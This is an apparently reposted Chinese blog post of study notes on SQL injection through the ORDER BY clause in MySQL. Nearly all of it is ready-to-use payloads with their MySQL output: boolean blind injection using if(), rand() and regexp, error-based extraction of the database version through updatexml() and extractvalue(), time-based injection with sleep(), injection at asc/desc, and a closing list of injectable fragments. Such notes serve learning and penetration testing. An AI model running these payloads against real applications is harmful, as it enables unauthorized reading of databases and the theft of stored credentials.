小结--order by 注入

其他 2018-05-24 00:06:45 阅读次数: 2

之前已经学过的东西,准备把他们依次总结下,包括之前看的一些文章,一些小的tricks之类的,就先从注入开始吧

0x01 盲注

1. 判断1和0

a. if

select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| admin | admintest |       1 |
+-------+-----------+---------+
1 row in set (0.00 sec)

b.rand

mysql> select rand(true);
+---------------------+
| rand(true)          |
+---------------------+
| 0.40540353712197724 |
+---------------------+
1 row in set (0.00 sec)

mysql> select rand(false);
+---------------------+
| rand(false)         |
+---------------------+
| 0.15522042769493574 |
+---------------------+
1 row in set (0.00 sec)

这里可以利用rand(true) rand(false)的值不同,排序注入后面的顺序也不同

mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
+-------+-----------+---------+
| user  | password  | user_id |
+-------+-----------+---------+
| test  | testadmin |       2 |
| admin | admintest |       1 |
| sp4rk | sp4rktest |       3 |
+-------+-----------+---------+
3 rows in set (0.02 sec)

c.regexp
select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);

0x02 报错注入

select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'

0x03 延时注入

select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

0x04 asc desc处

1.盲注

mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
+-------+
| user  |
+-------+
| admin |
| sp4rk |
| test  |
+-------+

报错,延时同上

0x05 逻辑区别进行排序

mysql> select user from user order by 1-if(1=1,user,user_id);
+-------+
| user  |
+-------+
| admin |
| test  |
| sp4rk |
+-------+
3 rows in set, 3 warnings (0.00 sec)

mysql> select user from user order by 1-if(1=1,user_id,user);
+-------+
| user  |
+-------+
| sp4rk |
| test  |
| admin |
+-------+

payload:    ,if(1=1,user_id,user);
,(case when (1=1) then user_id else user end)
,ifnull(null,user_id)
,rand(1=1)

0x06利用报错判断

payload:
if(1=1,1,(select 1 union select 2))  正确
if(1=2,1,(select 1 union select 2)) 错误
if(1=1,1,(select 1 from information_schema.tables)) 正确
if(1=2,1,(select 1 from information_schema.tables)) 错误

猜你喜欢

转载自www.cnblogs.com/spark-xl/p/9080398.html
今日推荐
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
周排行
static方法和非static方法的区别(java)
如何查找计算机专业paper
java.lang.ClassFormatError: Incompatible magic value 0 in class file com/sitecha
跳跃游戏II
stm32_之【建立工程】
TeaWeb v0.0.9 发布,统计底层优化、主机监控功能改进
事件分发 -----控制字体大小
JavaScript DOM练习(动态表格添加) December 25,2019
JSF Scope & CDI
实现从零搭建一个登录注册页面(附源代码)
每日归档
更多
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022